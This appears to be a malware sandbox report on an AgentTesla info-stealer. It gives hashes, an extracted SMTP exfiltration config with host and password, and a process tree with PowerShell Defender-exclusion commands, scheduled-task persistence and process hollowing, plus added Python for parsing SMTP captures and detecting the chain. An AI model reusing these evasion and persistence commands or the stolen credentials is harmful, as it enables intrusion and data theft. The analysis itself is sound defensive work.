Analysis
- max time kernel: 122s
- max time network: 123s
- platform: windows7_x64
- resource: win7-20240419-en
- resource tags: arch:x64, arch:x86, image:win7-20240419-en, locale:en-us, os:windows7-x64, system
- submitted: 09-06-2024 22:50

Static task: static1
Behavioral task: behavioral1
- Sample: STATEMENT OF ACCOUNT.exe
- Resource: win7-20240419-en
Behavioral task: behavioral2
- Sample: STATEMENT OF ACCOUNT.exe
- Resource: win10v2004-20240426-en
General
- Target: STATEMENT OF ACCOUNT.exe
- Size: 693KB
- MD5: c63d59194d1f0735dacda6ae00f46420
- SHA1: 1132adb51c8f80ce6b453c7d8c4399af579d5175
- SHA256: ce6cf51607a2fd0b3aa61c066d0adf7d659418c4cd78ef8824a46f89e639867b
- SHA512: ccae4b5d7bb389872bc162e6c2d00f280b2537db53c2dd1fe7f55142552dc792bba1bfbef21182ba4355e3f2b473447d70e654403b385b55c7496111ac4178b7
- SSDEEP: 12288:hTo2iNStcYl0SNGZSUKnBnn0kk9HSkqHcSxk9qNk2Q4PaUOvYbnjcueIGujE11/h:hTo1McNoGZS5CbHS9Hcz9qN3QIOQbnjO
Malware Config
Extracted family: agenttesla
- Protocol: smtp
- Host: mail.springandsummer.lk
- Port: 587
- Username: [email protected]
- Password: anu##323
- Email To: [email protected]
(The sender and recipient addresses are shown as [email protected] in this export; the real values are not recoverable from the page. The host, port and password are usable as-is for hunting in mail-gateway and proxy logs.)
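The extracted config gives the host, port and SMTP credentials the payload will use. An analyst usually wants to confirm them on the wire, so the following added example (written for this page; it is neither sandbox output nor AgentTesla code) parses a captured SMTP session into the same fields. Both transcripts are constructed: the host and port follow the config, while the client hostname, both e-mail addresses and the subject line are placeholders. It also handles the case the config does not spell out: on port 587 the client may negotiate STARTTLS, after which AUTH and DATA are encrypted and only the server name and EHLO hostname remain visible.

```python
"""Recover AgentTesla SMTP exfiltration parameters from a captured session.

Added example, not part of the sandbox report. The transcripts below are
constructed; addresses, client hostname and subject are placeholders.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional


@dataclass
class SmtpExfil:
    server: Optional[str] = None          # name from the 220 greeting
    ehlo: Optional[str] = None            # hostname the infected machine announces
    starttls: bool = False                # True: AUTH/DATA ran inside TLS, not recoverable
    username: Optional[str] = None
    password: Optional[str] = None
    mail_from: Optional[str] = None
    rcpt_to: List[str] = field(default_factory=list)
    subject: Optional[str] = None


_ADDR = re.compile(r"<([^>]+)>")


def _b64(text: str) -> Optional[str]:
    """Decode one base64 SMTP AUTH token; None if it is not valid base64."""
    try:
        return base64.b64decode(text.strip(), validate=True).decode("utf-8", "replace")
    except (ValueError, UnicodeDecodeError):
        return None


def parse_smtp_session(transcript: str) -> SmtpExfil:
    """Walk a 'C: ' / 'S: ' transcript and pull out the exfil parameters.

    Parsing stops as soon as the server accepts STARTTLS: from that point
    the capture holds only TLS records, so just server and EHLO survive.
    """
    out = SmtpExfil()
    auth_state = None          # None | "user" | "pass" while inside AUTH LOGIN
    tls_requested = False
    in_data = False
    for raw in transcript.splitlines():
        if raw[:2] not in ("C:", "S:"):
            continue
        side, line = raw[0], raw[2:].strip()
        if side == "S":
            if line.startswith("220"):
                if tls_requested:               # 220 after STARTTLS: channel goes dark
                    out.starttls = True
                    break
                parts = line.split()
                out.server = parts[1] if len(parts) > 1 else None
            continue
        upper = line.upper()
        if in_data:                             # message body until a lone "."
            if line == ".":
                in_data = False
            elif upper.startswith("SUBJECT:") and out.subject is None:
                out.subject = line[8:].strip()
            continue
        if auth_state == "user":
            out.username, auth_state = _b64(line), "pass"
        elif auth_state == "pass":
            out.password, auth_state = _b64(line), None
        elif upper.startswith(("EHLO ", "HELO ")):
            out.ehlo = line.split(None, 1)[1]
        elif upper == "STARTTLS":
            tls_requested = True
        elif upper.startswith("AUTH LOGIN"):
            parts = line.split()
            if len(parts) == 3:                 # initial-response form: AUTH LOGIN <b64 user>
                out.username, auth_state = _b64(parts[2]), "pass"
            else:
                auth_state = "user"
        elif upper.startswith("AUTH PLAIN "):
            fields = (_b64(line.split(None, 2)[2]) or "").split("\x00")  # authzid\0user\0pass
            if len(fields) == 3:
                out.username, out.password = fields[1], fields[2]
        elif upper.startswith("MAIL FROM:"):
            m = _ADDR.search(line)
            out.mail_from = m.group(1) if m else None
        elif upper.startswith("RCPT TO:"):
            m = _ADDR.search(line)
            if m:
                out.rcpt_to.append(m.group(1))
        elif upper == "DATA":
            in_data = True
    return out


def _b64e(s: str) -> str:
    return base64.b64encode(s.encode()).decode()


# Constructed plaintext capture modelled on the extracted config (placeholders for addresses).
PLAINTEXT_SESSION = f"""
S: 220 mail.springandsummer.lk ESMTP
C: EHLO DESKTOP-1A2B3C
S: 250-mail.springandsummer.lk
S: 250 AUTH LOGIN PLAIN
C: AUTH LOGIN
S: 334 VXNlcm5hbWU6
C: {_b64e('sender@example.invalid')}
S: 334 UGFzc3dvcmQ6
C: {_b64e('anu##323')}
S: 235 2.7.0 Authentication successful
C: MAIL FROM:<sender@example.invalid>
S: 250 2.1.0 Ok
C: RCPT TO:<dropbox@example.invalid>
S: 250 2.1.5 Ok
C: DATA
S: 354 End data with <CR><LF>.<CR><LF>
C: Subject: PW_Admin/DESKTOP-1A2B3C
C:
C: (stolen credentials would follow here)
C: .
S: 250 2.0.0 Ok: queued
C: QUIT
"""

# Constructed capture where the client upgrades to TLS before authenticating.
STARTTLS_SESSION = """
S: 220 mail.springandsummer.lk ESMTP
C: EHLO DESKTOP-1A2B3C
S: 250-mail.springandsummer.lk
S: 250-STARTTLS
S: 250 AUTH LOGIN PLAIN
C: STARTTLS
S: 220 2.0.0 Ready to start TLS
C: (TLS records from here on; AUTH and DATA are not visible)
"""

if __name__ == "__main__":
    print(parse_smtp_session(PLAINTEXT_SESSION))
    print(parse_smtp_session(STARTTLS_SESSION))
```

When the STARTTLS branch fires the parser deliberately returns without credentials rather than guessing: the config extracted from the binary is then the only source for username and password, and the pcap can at most corroborate the server name and the victim hostname.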
Signatures
- AgentTesla
  Agent Tesla is a .NET-based remote access tool (RAT) and information stealer; this sample's extracted config points it at SMTP exfiltration.
- Command and Scripting Interpreter: PowerShell (1 TTP, 2 IoCs)
  Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, or processes.
  Processes: powershell.exe (PID 2716), powershell.exe (PID 2684)
- Adds Run key to start application (2 TTPs, 1 IoC)
  Process: RegSvcs.exe (PID 1028)
  Set value (str): \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\boqXv = "C:\\Users\\Admin\\AppData\\Roaming\\boqXv\\boqXv.exe"
  Note that the value points at boqXv\boqXv.exe, a different name from the IyoNJg.exe path that is excluded from Defender and scheduled below; both locations are persistence candidates to collect.
- Suspicious use of SetThreadContext (1 IoC)
  PID 2456 (STATEMENT OF ACCOUNT.exe) set the thread context of PID 1028 (RegSvcs.exe, procid_target 34). Together with the twelve WriteProcessMemory events into the same process below, this is the process-hollowing pattern: the loader starts the Microsoft-signed .NET utility, writes the AgentTesla payload into it and redirects its thread, which is why the Run key write and the process enumeration are attributed to RegSvcs.exe rather than to the dropper.
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Suspicious behavior: EnumeratesProcesses (11 IoCs)
  Processes: STATEMENT OF ACCOUNT.exe (PID 2456, 7 events), RegSvcs.exe (PID 1028, 2 events), powershell.exe (PID 2684), powershell.exe (PID 2716)
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Token: SeDebugPrivilege in STATEMENT OF ACCOUNT.exe (PID 2456), RegSvcs.exe (PID 1028), powershell.exe (PID 2684), powershell.exe (PID 2716)
- Suspicious use of WriteProcessMemory (24 IoCs)
  Source: STATEMENT OF ACCOUNT.exe (PID 2456), writing into:
  - PID 2716 powershell.exe (procid_target 28): 4 events
  - PID 2684 powershell.exe (procid_target 30): 4 events
  - PID 1616 schtasks.exe (procid_target 32): 4 events
  - PID 1028 RegSvcs.exe (procid_target 34): 12 events
Processes
1. C:\Users\Admin\AppData\Local\Temp\STATEMENT OF ACCOUNT.exe (PID 2456)
   Command line: "C:\Users\Admin\AppData\Local\Temp\STATEMENT OF ACCOUNT.exe"
   - Suspicious use of SetThreadContext
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of AdjustPrivilegeToken
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2716)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\STATEMENT OF ACCOUNT.exe"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2684)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\IyoNJg.exe"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
   2. C:\Windows\SysWOW64\schtasks.exe (PID 1616)
      Command line: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IyoNJg" /XML "C:\Users\Admin\AppData\Local\Temp\tmp5928.tmp"
      - Creates scheduled task(s)
   2. C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe (PID 1028)
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      - Adds Run key to start application
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

Reading the tree: the children are invoked as System32 paths on their command lines but run from SysWOW64 (and RegSvcs.exe from the 32-bit Framework directory) because the loader is a 32-bit process and WOW64 file-system redirection applies. The first exclusion covers the dropper itself, the second the copy it intends to place at AppData\Roaming\IyoNJg.exe, which the scheduled task "Updates\IyoNJg" (defined in a temporary XML file) is meant to relaunch; Add-MpPreference needs an elevated token, so on a standard-user host these exclusions are not applied. RegSvcs.exe started with no arguments (legitimately it takes an assembly to register and exits) and then writing a Run key is the injected payload acting, not the utility.
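The chain above (two Defender exclusions, a scheduled task built from an XML file in Temp, an argument-less RegSvcs.exe that writes a Run key, all children of one binary in the user's Temp directory) is what an endpoint rule should key on rather than any single event. The example below is added for this page and is not part of the sandbox report: it runs four rules over constructed Sysmon-style events (process create and registry set) built from the PIDs and command lines in the tree, then correlates findings by the parent they trace back to. The field names, the explorer.exe parent PID and the list of sibling .NET hosts beyond RegSvcs.exe are assumptions.

```python
"""Detection logic for the loader chain in the report, run over constructed telemetry.

Added example, not part of the sandbox report. EVENTS mirrors the report's
process tree and Run-key write in a Sysmon-like shape (id 1 = process create,
id 13 = registry value set); field names and the explorer.exe parent are assumptions.
"""
import re
from collections import defaultdict
from typing import Dict, List, Set

USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\", re.IGNORECASE)
EXCLUSION_CMD = re.compile(r"Add-MpPreference\s.*-Exclusion(Path|Process|Extension)", re.IGNORECASE)
SCHTASKS_XML = re.compile(r'/Create\b.*?/XML\s+"?([^"]+?\\AppData\\Local\\Temp\\[^"]+)', re.IGNORECASE)
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.IGNORECASE)
# RegSvcs.exe is the host seen in this run; the siblings are other signed .NET
# utilities hollowed the same way (generalisation, not taken from the report).
DOTNET_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe"}

EVENTS = [  # constructed, modelled on the report's process tree
    {"id": 1, "pid": 1200, "ppid": 900, "image": r"C:\Windows\explorer.exe", "cmd": r"C:\Windows\explorer.exe"},
    {"id": 1, "pid": 2456, "ppid": 1200, "image": r"C:\Users\Admin\AppData\Local\Temp\STATEMENT OF ACCOUNT.exe",
     "cmd": r'"C:\Users\Admin\AppData\Local\Temp\STATEMENT OF ACCOUNT.exe"'},
    {"id": 1, "pid": 2716, "ppid": 2456, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\STATEMENT OF ACCOUNT.exe"'},
    {"id": 1, "pid": 2684, "ppid": 2456, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\IyoNJg.exe"'},
    {"id": 1, "pid": 1616, "ppid": 2456, "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmd": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IyoNJg" /XML "C:\Users\Admin\AppData\Local\Temp\tmp5928.tmp"'},
    {"id": 1, "pid": 1028, "ppid": 2456, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "cmd": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"'},
    {"id": 13, "pid": 1028, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "target": r"HKU\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\boqXv",
     "details": r"C:\Users\Admin\AppData\Roaming\boqXv\boqXv.exe"},
    # benign control: an admin querying Defender interactively must not fire
    {"id": 1, "pid": 3100, "ppid": 1200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-MpPreference'},
]


def _name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _finding(rule: str, pid: int, loader, detail: str) -> Dict:
    return {"rule": rule, "pid": pid, "loader": loader, "detail": detail}


def evaluate(events: List[Dict]) -> List[Dict]:
    """Apply the four rules; 'loader' is the PID each finding is attributed to."""
    ppid = {e["pid"]: e["ppid"] for e in events if e["id"] == 1}
    image = {e["pid"]: e["image"] for e in events if e["id"] == 1}
    out: List[Dict] = []
    for e in events:
        if e["id"] == 1:
            name, cmd, parent = _name(e["image"]), e["cmd"], e["ppid"]
            if name in ("powershell.exe", "pwsh.exe") and EXCLUSION_CMD.search(cmd):
                out.append(_finding("defender_exclusion", e["pid"], parent, cmd))
            elif name == "schtasks.exe" and (m := SCHTASKS_XML.search(cmd)):
                out.append(_finding("schtasks_xml_from_temp", e["pid"], parent, m.group(1)))
            elif (name in DOTNET_HOSTS
                  and cmd.strip().strip('"').lower() == e["image"].lower()   # no arguments at all
                  and USER_WRITABLE.search(image.get(parent, ""))):          # parent lives in AppData
                out.append(_finding("dotnet_host_no_args", e["pid"], parent, e["image"]))
        elif e["id"] == 13 and RUN_KEY.search(e["target"]) and USER_WRITABLE.search(e["details"]):
            value = e["target"].rsplit("\\", 1)[-1]
            # attribute to the writer's parent: the hollowed host is only the vehicle
            out.append(_finding("run_key_to_appdata", e["pid"], ppid.get(e["pid"]), f"{value} -> {e['details']}"))
    return out


def loader_chains(findings: List[Dict], min_rules: int = 2) -> Dict[int, Set[str]]:
    """Group findings by attributed loader; two or more distinct rules from one
    parent is the chain worth an alert, a lone exclusion is noisier on its own."""
    by_loader: Dict[int, Set[str]] = defaultdict(set)
    for f in findings:
        if f["loader"] is not None:
            by_loader[f["loader"]].add(f["rule"])
    return {pid: rules for pid, rules in by_loader.items() if len(rules) >= min_rules}


if __name__ == "__main__":
    hits = evaluate(EVENTS)
    for f in hits:
        print(f"{f['rule']:<24} pid={f['pid']} loader={f['loader']} {f['detail']}")
    print(loader_chains(hits))
```

The Run-key finding is attributed to the parent of the writing process rather than to RegSvcs.exe itself, because after hollowing the signed utility is only the vehicle; without that step the four rules would point at four different PIDs and the correlation in loader_chains would miss the dropper.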
Network
MITRE ATT&CK Enterprise v15
Downloads (dropped files)
- (no path listed for this entry)
  Filesize: 1KB
  MD5: e5495e08dcc55693d845b46a075e340a
  SHA1: ff5e256abdf84986c71d78cf94abcc7b4bfa04ef
  SHA256: 9b50714a4e49026825761d5ca37db015a9548868c888c07b13a4c2ad7a1b5bd9
  SHA512: db610e452703c8419a71e2839df28e9d58028d981e3a01c94cbdecf4c8744d7d1814b235e7314810706e1c4a13c5849be52020159b81b972a5584cea35617012
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  Filesize: 7KB
  MD5: 2288cd15699fa32dfeeebc7077759804
  SHA1: 7eb2c9104d0e86ddec676318a72d56426422638b
  SHA256: c76835442cfdc480e93f14863edfc8fd6c0211b2bdd377a99cff121b0b1f1c2a
  SHA512: 42a4564153095e231e08ee5fd270a18a44fc855301b5db30c0438e59ff273845aca2ad62d6955c0d46ce3d00afe47f637b0556e06f78ae46b32fd8f1a4ccef85
  This is an Explorer jump-list file written by the OS when the sample was launched, not a payload; its hashes are environment noise and should not be used as indicators.